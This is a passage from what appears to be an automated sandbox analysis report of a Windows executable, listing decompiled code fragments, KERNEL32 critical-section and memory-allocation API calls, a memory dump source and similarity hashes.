                                                                                                                                                                                              					}
                                                                                                                                                                                              					return 0;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_v8 = 0;
                                                                                                                                                                                              					return _v8;
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}













                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RtlEnterCriticalSection.KERNEL32(0041C5B4,00000000,^), ref: 004024AF
                                                                                                                                                                                              • RtlLeaveCriticalSection.KERNEL32(0041C5B4,00402524), ref: 00402517
                                                                                                                                                                                                • Part of subcall function 00401870: RtlInitializeCriticalSection.KERNEL32(0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401886
                                                                                                                                                                                                • Part of subcall function 00401870: RtlEnterCriticalSection.KERNEL32(0041C5B4,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401899
                                                                                                                                                                                                • Part of subcall function 00401870: LocalAlloc.KERNEL32(00000000,00000FF8,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 004018C3
                                                                                                                                                                                                • Part of subcall function 00401870: RtlLeaveCriticalSection.KERNEL32(0041C5B4,0040192D,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401920
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                                                                                                                              • String ID: ^
                                                                                                                                                                                              • API String ID: 2227675388-551292248
                                                                                                                                                                                              • Opcode ID: eac761777844288f10562a69e6fe07890201df0bfc717e3aee39787a8c1195b3
                                                                                                                                                                                              • Instruction ID: 4ed45a5183fb1a6edd108f9af425bfacc088641811e0c18f6da98f6ec62fa594
                                                                                                                                                                                              • Opcode Fuzzy Hash: eac761777844288f10562a69e6fe07890201df0bfc717e3aee39787a8c1195b3
                                                                                                                                                                                              • Instruction Fuzzy Hash: 92113431700210AEEB25AB7A5F49B5A7BD59786358F20407FF404F32D2D6BD9C00825C
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%